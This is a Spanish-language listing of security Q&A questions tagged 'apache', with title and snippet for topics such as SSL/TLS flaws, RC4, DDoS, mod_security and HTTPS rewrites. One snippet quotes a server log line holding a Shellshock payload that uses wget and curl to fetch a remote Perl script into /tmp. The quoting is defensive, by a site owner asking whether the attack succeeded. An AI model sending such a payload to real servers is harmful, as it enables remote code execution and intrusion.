Preguntas con etiqueta 'apache'

2
respuestas

¿Cómo mitigar la vulnerabilidad de divulgación de información en la implementación del vector de inicialización del protocolo SSL / TLS?

Descargo de responsabilidad: no soy un administrador de sistemas, intenta dar tus respuestas en un lenguaje amigable para el desarrollador;) Estoy probando una nueva imagen de VPS con Nessus y obtengo el complemento 58751 . Intenté averiguar...
hecha 25.05.2012 - 16:07
1
respuesta

Experiencia con un reciente ataque DDoS en Apache

Originalmente publiqué una pregunta aquí ya que no estaba familiarizado con un ataque distribuido real de denegación de servicio (DDoS) en mi servidor. Noté que mi servidor es muy lento en responder a las solicitudes HTTP, mientras que las sol...
hecha 22.10.2012 - 16:40
1
respuesta

Cómo deshabilitar el cifrado RC4 en ubuntu 12.04

He estado haciendo Network Scan para nuestra caja y Ncircle informó Servidor SSL compatible con cifrados RC4 para SSLv3 . En base a eso, hice una búsqueda y planeo agregar a /etc/apache/conf.d/security lo siguiente: SSLProtocol -ALL +S...
hecha 27.09.2014 - 15:31
1
respuesta

¿Por qué Apache se ejecuta como un usuario sin privilegios?

El servidor web Apache como medida de seguridad renuncia a sus privilegios de sistema y se ejecuta como un usuario normal sin privilegios antes de aceptar clientes a través de una red. Mi pregunta es Cómo esta medida previene o restringe los...
hecha 17.12.2013 - 18:58
3
respuestas

¿Cómo acceder a los directorios no permitidos en robots.txt?

Al escanear mi sitio web con uniscan, encontró mi archivo robots.txt que no permite el acceso a /cgi-bin/ y otros directorios, pero no están disponibles en el navegador. ¿Hay alguna manera de acceder a los directorios o archivos qu...
hecha 30.04.2014 - 11:33
1
respuesta

Evidencia de Shellshock Exploit: ¿es este un ataque exitoso?

Estuve revisando los registros hoy y noté lo siguiente: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/b...
hecha 27.12.2016 - 02:36
1
respuesta

Estado actual de BREACH (GZIP SSL Attack)?

Ha pasado un año desde que BREACH se abrió camino en nuestros corazones, y no parece haber ningún artículo o publicación o parche desde entonces, ¿mi debilitamiento de Google-fu? ¿Se ha mitigado o parcheado BREACH en Apache / nginx? ¿Podem...
hecha 15.08.2014 - 12:07
3
respuestas

¿Puede saber si una página existe incluso si arroja un 404?

¿Es posible determinar que una página existe realmente cuando está diseñada para lanzar un 404 NOT FOUND ? En mi servidor, cuando se realiza una solicitud a un script al pasar parámetros no válidos, estoy lanzando un código de estado HT...
hecha 27.01.2017 - 23:12
5
respuestas

Tema principal de tesis - mod_security

He estado jugando con mod_security por algún tiempo y me gustaría usarlo en mi tesis de maestría. No sé exactamente cómo podría ser más interesante este trabajo que describir qué hace mod_security, qué tipo de ataques web se pueden evitar al usa...
hecha 21.01.2011 - 22:02
3
respuestas

¿Es segura una reescritura forzada de http a https? ¿Qué añade SSLRequireSSL?

He leído consejos contradictorios sobre cómo forzar conexiones https de la siguiente manera: RewriteEngine On RewriteCond %{HTTPS} off RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} A mi parecer, esto no permitiría que nadie pase una s...
hecha 19.10.2012 - 00:48